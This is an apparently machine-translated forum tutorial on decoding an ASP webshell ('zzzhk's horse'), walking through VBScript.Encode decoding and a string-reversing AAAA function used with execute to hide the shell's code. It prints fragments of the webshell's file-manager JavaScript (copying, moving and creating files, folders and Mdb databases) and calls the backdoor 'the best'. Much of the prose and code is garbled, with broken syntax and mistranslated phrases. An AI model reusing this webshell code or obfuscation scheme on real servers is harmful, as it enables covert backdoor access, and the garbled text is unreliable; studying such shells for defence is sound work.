Search for decryption functions for asp Trojan Files

Let's take a demonstration of zzzhk's horse today. His horse backdoor is also the best.

First, we can see <% @ LANGUAGE = VBScript. Encode %>

 

Then we will use an asp anti-encoding tool, a bunch of Baidu tools, etc.

Note that the character "X" will be removed from the semi-automated exit mode in the case of anti-encoding. Solution: Replace the character "X" with a symbol such as "X ".

 

Then open the tool

 

 

Take it off. copy it and save it as 1.asp.

Next, find the custom decryption function.

 

 

Escape encrypts Baidu's UnEscape for decryption

RRS "<script language = javascript> function killErrors () {return true;} window. onerror = killErrors ;"
RRS "function yesok () {if (confirm (" "Are you sure you want to perform this operation ?" ") Return true; else return false ;}"
RRS "function ShowFolder (Folder) {top. addrform. FolderPath. value = Folder; top. addrform. submit ();}"
RRS "function FullForm (FName, FAction) {top. hideform. FName. value = FName; if (FAction = "" CopyFile "") {DName = prompt. hideform. FName. value + = "" | "" + DName;} else if (FAction = "" MoveFile "") {DName = prompt ("" Please input _ move _ to the target file _ all _ name_name "", FName); top. hideform. FName. value + = "" | "" + DName;} else if (FAction = "" CopyFolder "") {DName = prompt ("" Please enter _ all _ name_name "", FName); top. hideform. FN Ame. value + = "" | "" + DName;} else if (FAction = "" MoveFolder "") {DName = prompt ("" Please enter _ all _ name_name "", FName); top. hideform. FName. value + = "" | "" + DName;} else if (FAction = "" NewFolder "") {DName = prompt ("" Please enter the folder to be created _ all _ name_name "", FName); top. hideform. FName. value = DName;} else if (FAction = "" CreateMdb "") {DName = prompt ("" Please enter the name of the Mdb file to be created _ all _ name_name, note that the name cannot be the same!" ", FName); top. hideform. FName. value = DName;} else if (FAction = "" CompactMdb "") {DName = prompt ("enter the name of the Mdb file to be compressed _ all _ name_name, check whether the file exists!" ", FName); top. hideform. FName. value = DName;} else {DName =" "Other" ";} if (DName! = Null) {top. hideform. action. value = FAction; top. hideform. submit ();} else {top. hideform. FName. value = ";}}""

The result is displayed.

Find execute AAAA ("xxxxxxxxxxxxxxxxxxxx") and find a bunch of things... we will look for the decryption function.

Function AAAA (objstr)

Objstr = Replace (objstr, "delimiter ","""")

For I = 1 To Len (objstr)

If Mid (objstr, I, 1) <> "Ω" Then

NewStr = Mid (objstr, I, 1) & NewStr

Else

NewStr = vbCrlf & NewStr

End If

Next

AAAA = NewStr

End Function

You can directly put it in VB.

Select "" content: "XXXXXXXXXXXXXXXXXX" in execute AAAA ("XXXXXXXXXXXXXXXXXX ")

And so on... The idea is like this.

Okay. Write it again in another day. If you don't understand it, please leave a message... Don't laugh

Source: Network Security